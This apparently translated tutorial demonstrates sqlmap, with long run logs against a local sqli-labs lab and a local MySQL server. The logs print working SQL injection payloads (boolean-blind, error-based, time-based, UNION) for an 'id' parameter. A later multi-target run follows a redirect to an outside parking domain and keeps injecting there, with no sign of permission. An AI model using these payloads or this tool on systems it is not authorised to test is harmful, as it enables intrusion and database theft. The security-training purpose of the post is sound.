1, sqlmap get target
1. Introduction to SQL injection
The so-called SQL injection is to cheat the server to execute malicious SQL commands by inserting SQL commands into the web form to submit or enter the query string of domain name or page request. Specifically, it is the ability to inject SQL commands into the background database engine by using existing applications. It can get the database on a website with security vulnerabilities by inputting SQL statements in web forms, rather than executing SQL statements according to the designer's intention. SQL injection can occur anywhere in an unknown HTTP packet. After creating the local service, visit the sub page, click Less-1 and add the parameter * *? id=2 * *, the login name and password will be returned to the web page
2.SQL output level
The output information of Sqlmap is divided into seven levels from simple to complex, namely 0, 1, 2, 3, 4, 5 and 6. Use the parameter - V to specify a level, for example, use the parameter - v 6 to specify the output level as 6.
- 0: only the tracebacks information, ERROR information [ERROR] and CRITICAL information [CRITICAL] of Python are displayed
- 1: Both general information [INFO] and WARNING information [WARNING] are displayed
- 2: Debugging information [DEBUG] is displayed at the same time
- 3: At the same time, the attack load used by the injection is displayed
- 4: Display HTTP request header at the same time
- 5: HTTP response headers are also displayed
- 6: Show HTTP response body at the same time
The default output level is 1, which is generally output to v3.
3.sqlmap acquisition target
sqlmap direct database
(1) Service database MySQL, Oracle, etc.:
python3 sqlmap.py -d "mysql://User name: password @ address: port / database name "- f --banner --dbs --users
Among them, banner is fingerprint, including some details of the database. Use examples:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:16:55 /2020-02-25/
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:16:55] [INFO] testing MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] confirming MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] the back-end DBMS is MySQL
[18:16:55] [INFO] fetching banner
[18:16:55] [INFO] resumed: [['5.7.26']]...
[18:16:55] [INFO] actively fingerprinting MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:16:55 /2020-02-25/
It returns some basic information of the database, such as database version, etc. The return result is faster, which may be due to some probes in advance and the generation of cache. Another example:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:20:41 /2020-02-25/
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:20:42] [INFO] testing MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] confirming MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] the back-end DBMS is MySQL
[18:20:42] [INFO] fetching banner
[18:20:42] [INFO] resumed: [['5.7.26']]...
[18:20:42] [INFO] actively fingerprinting MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:20:42] [INFO] fetching database users
[18:20:42] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:20:42 /2020-02-25/
The content returned by the user is added on the basis of the previous content. Another example:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:25:20 /2020-02-25/
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:25:20] [INFO] testing MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] confirming MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] the back-end DBMS is MySQL
[18:25:20] [INFO] fetching banner
[18:25:20] [INFO] resumed: [['5.7.26']]...
[18:25:20] [INFO] actively fingerprinting MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:25:20] [INFO] fetching database users
[18:25:20] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:25:20] [INFO] fetching database names
[18:25:20] [INFO] resumed: [['information_schema'], ['challenges'], ['demo'], ['demo1125'], ['demo1204'], ['dvwa'], ['jingdong'], ['mysql'], ['performance
_schema'], ['pythontest'], ['security'], ['sys']]...
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:25:20 /2020-02-25/
On the basis of the previous, the returned content is added to the database.
(2) File database SQLite
sqlmap specifies the destination URL
sqlmap detects a single URL directly, and the parameter uses - u or – URL. The url format is:
http(s)://targeturl\[:port\]/
give an example:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=2 --banner
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:37:12 /2020-02-25/
[18:37:12] [INFO] testing connection to the target URL
[18:37:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:37:12] [INFO] testing if the target URL content is stable
[18:37:12] [INFO] target URL content is stable
[18:37:12] [INFO] testing if GET parameter 'id' is dynamic
[18:37:12] [INFO] GET parameter 'id' appears to be dynamic
[18:37:12] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:37:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:37:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:37:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:17] [WARNING] reflective value(s) found and filtering out
[18:37:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:37:17] [INFO] testing 'Generic inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:37:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:37:17] [INFO] testing 'MySQL inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:37:17] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:37:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:37:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[18:37:28] [INFO] target URL appears to have 3 columns in query
[18:37:28] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0
x7176627071)-- -
---
[18:37:28] [INFO] the back-end DBMS is MySQL
[18:37:28] [INFO] fetching banner
[18:37:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:37:28] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 18:37:28 /2020-02-25/ Among them are: Type: Boolean based blind indicates boolean type blind annotation; Payload: id=2 'AND 7360=7360 AND' lcZO '=' lcZO indicates the query criteria, that is, the parameters after the url. It can be accessed normally after connection, as shown in the figure
There are sql injection points and dynamic web pages to access, such as? After the parameter, such as id=2, interacts with the database, it can be accessed at this time. If it is a static web page and does not interact with the database, it can not be detected. The url cannot be quoted, otherwise it will prompt that the url is invalid.
sqlmap reads different file types for SQL injection
(1) In order to facilitate the collection of search engines, many websites have specially generated site maps in xml format for search engines. The parameter is - x. (2) Read multiple targets from multi line text format files and detect multiple targets. The parameter is - m. Write a target Txt, which reads: www.target3.com/vuln3/id/1* www.target1.com/vuln1.php?q=foobar
Test:
python sqlmap.py -m "xxx\target.txt" --banner
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not res
onsible for any misuse or damage caused by this program
[*] starting @ 19:59:27 /2020-02-25/
[19:59:27] [INFO] parsing multiple targets list from 'xxx\targer.txt'
[19:59:27] [INFO] found a total of 3 targets
URL 1:
GET www.target2.com/vuln2.asp?id=1
do you want to test this URL? [Y/n/q]
>
[19:59:29] [INFO] testing URL 'www.target2.com/vuln2.asp?id=1'
[19:59:29] [INFO] using 'xxxx\sqlmap\output\results-02252020_0759pm.csv' as the CSV results file in multiple targets mode
[19:59:29] [INFO] testing connection to the target URL
[19:59:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:30] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:59:33] [CRITICAL] unable to connect to the target URL
[19:59:33] [INFO] testing if the target URL content is stable
[19:59:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:35] [CRITICAL] unable to connect to the target URL
[19:59:35] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[19:59:35] [INFO] testing if GET parameter 'id' is dynamic
[19:59:38] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:40] [CRITICAL] unable to connect to the target URL
[19:59:40] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:59:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] y
[20:00:20] [CRITICAL] connection timed out to the target URL
[20:00:20] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:00:20] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:21] [CRITICAL] unable to connect to the target URL
[20:00:21] [INFO] testing for SQL injection on GET parameter 'id'
[20:00:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:00:21] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:22] [CRITICAL] unable to connect to the target URL
[20:00:24] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:25] [CRITICAL] unable to connect to the target URL
[20:00:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:28] [CRITICAL] unable to connect to the target URL
[20:00:28] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:30] [CRITICAL] unable to connect to the target URL
[20:00:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:31] [CRITICAL] unable to connect to the target URL
[20:00:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:00:32] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:35] [CRITICAL] unable to connect to the target URL
[20:00:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:00:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:37] [CRITICAL] unable to connect to the target URL
[20:00:37] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:39] [CRITICAL] unable to connect to the target URL
[20:00:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:40] [CRITICAL] unable to connect to the target URL
[20:00:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:42] [CRITICAL] unable to connect to the target URL
[20:00:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:46] [CRITICAL] unable to connect to the target URL
[20:00:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:00:46] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:48] [CRITICAL] unable to connect to the target URL
[20:00:48] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:50] [CRITICAL] unable to connect to the target URL
[20:00:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:52] [CRITICAL] unable to connect to the target URL
[20:00:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:53] [CRITICAL] unable to connect to the target URL
[20:00:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:25] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[20:01:25] [CRITICAL] connection timed out to the target URL
[20:01:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:01:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:26] [CRITICAL] unable to connect to the target URL
[20:01:27] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:29] [CRITICAL] unable to connect to the target URL
[20:01:29] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:00] [CRITICAL] connection timed out to the target URL
[20:02:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:05] [CRITICAL] unable to connect to the target URL
[20:02:06] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:08] [CRITICAL] unable to connect to the target URL
[20:02:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:02:08] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:10] [CRITICAL] unable to connect to the target URL
[20:02:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:41] [CRITICAL] connection timed out to the target URL
[20:02:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:43] [CRITICAL] unable to connect to the target URL
[20:02:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:44] [CRITICAL] unable to connect to the target URL
[20:02:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:47] [CRITICAL] unable to connect to the target URL
[20:02:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:02:47] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:49] [CRITICAL] unable to connect to the target URL
[20:02:49] [INFO] testing 'Generic inline queries'
[20:02:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:53] [CRITICAL] unable to connect to the target URL
[20:02:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:02:53] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:02:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:56] [CRITICAL] unable to connect to the target URL
[20:02:57] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:57] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session
-technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[20:02:58] [CRITICAL] unable to connect to the target URL
[20:02:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:03] [CRITICAL] unable to connect to the target URL
[20:03:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:07] [CRITICAL] unable to connect to the target URL
[20:03:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:03:08] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:40] [CRITICAL] unable to connect to the target URL
[20:03:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:43] [CRITICAL] unable to connect to the target URL
[20:03:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:45] [CRITICAL] unable to connect to the target URL
[20:03:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:03:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:48] [CRITICAL] unable to connect to the target URL
[20:03:48] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:49] [CRITICAL] unable to connect to the target URL
[20:03:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:53] [CRITICAL] unable to connect to the target URL
[20:03:53] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:55] [CRITICAL] unable to connect to the target URL
[20:03:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:03:55] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:56] [CRITICAL] unable to connect to the target URL
[20:03:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:58] [CRITICAL] unable to connect to the target URL
[20:03:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:01] [CRITICAL] unable to connect to the target URL
[20:04:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:03] [CRITICAL] unable to connect to the target URL
[20:04:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:05] [CRITICAL] unable to connect to the target URL
[20:04:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:06] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:09] [CRITICAL] unable to connect to the target URL
[20:04:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:12] [CRITICAL] unable to connect to the target URL
[20:04:15] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:17] [CRITICAL] unable to connect to the target URL
[20:04:47] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:48] [CRITICAL] unable to connect to the target URL
[20:04:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:04:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:50] [CRITICAL] unable to connect to the target URL
[20:04:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:51] [CRITICAL] unable to connect to the target URL
[20:04:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:53] [CRITICAL] unable to connect to the target URL
[20:04:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:55] [CRITICAL] unable to connect to the target URL
[20:04:55] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:56] [CRITICAL] unable to connect to the target URL
[20:04:56] [INFO] testing 'Oracle AND time-based blind'
[20:04:56] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:00] [CRITICAL] unable to connect to the target URL
[20:05:01] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:02] [CRITICAL] unable to connect to the target URL
[20:05:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:04] [CRITICAL] unable to connect to the target URL
[20:05:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:07] [CRITICAL] unable to connect to the target URL
[20:05:07] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:08] [CRITICAL] unable to connect to the target URL
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:09:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:09:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:50] [CRITICAL] unable to connect to the target URL
[20:09:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:52] [CRITICAL] unable to connect to the target URL
[20:09:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:54] [CRITICAL] unable to connect to the target URL
[20:09:56] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:57] [CRITICAL] unable to connect to the target URL
[20:09:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:59] [CRITICAL] unable to connect to the target URL
[20:09:59] [WARNING] GET parameter 'id' does not seem to be injectable
[20:09:59] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.
. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
URL 2:
GET www.target3.com/vuln3/id/1*
do you want to test this URL? [Y/n/q]
> y
[20:10:07] [INFO] testing URL 'www.target3.com/vuln3/id/1*'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[20:10:12] [INFO] testing connection to the target URL
[20:10:15] [CRITICAL] page not found (404)
[20:10:15] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
URL 3:
GET www.target1.com/vuln1.php?q=foobar
do you want to test this URL? [Y/n/q]
> y
[20:10:20] [INFO] testing URL 'www.target1.com/vuln1.php?q=foobar'
[20:10:20] [INFO] testing connection to the target URL
got a 302 redirect to 'http://1223.dragonparking.com/?site=www.target1.com'. Do you want to follow? [Y/n] y
[20:10:35] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[20:10:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:10:46] [INFO] testing if the target URL content is stable
[20:10:59] [WARNING] GET parameter 'q' does not appear to be dynamic
[20:11:00] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[20:11:05] [INFO] testing for SQL injection on GET parameter 'q'
[20:11:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:13:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:13:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:13:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:14:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:14:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:16:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:16:19] [INFO] testing 'Generic inline queries'
[20:16:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:16:22] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:17:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:17:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:19:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:20:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:21:08] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[20:21:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:23:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:26:48] [INFO] target URL appears to have 219 columns in query
[20:26:48] [WARNING] applying generic concatenation (CONCAT)
[20:39:22] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[20:39:22] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:41:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:45:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[21:10:38] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
